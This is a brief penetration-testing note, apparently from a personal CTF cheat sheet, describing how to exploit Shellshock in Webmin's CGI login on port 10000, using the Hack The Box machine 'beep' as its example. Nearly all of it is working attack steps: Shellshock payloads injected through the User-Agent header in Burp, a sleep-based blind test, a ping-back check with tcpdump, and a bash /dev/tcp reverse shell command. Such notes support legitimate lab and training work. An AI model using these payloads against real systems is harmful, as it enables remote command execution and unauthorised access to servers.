Port 10000 Webmin

Webmin uses CGI Files and is vulnerable to shellshock eg:- beep on HTB.

From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.

Now change the user agent to shell shock and try following payloads.

() { :; };/bin/echo heloo
() { :; }; sleep 10   (did work some kind of blind shell shock)

Now check ping

() { :; };ping -c 1
on our machine
sudo tcpdump -i tun0 -v

And we get the ping. So lets try reverse shell.

sh -i >& /dev/tcp/ 0>&1

Last updated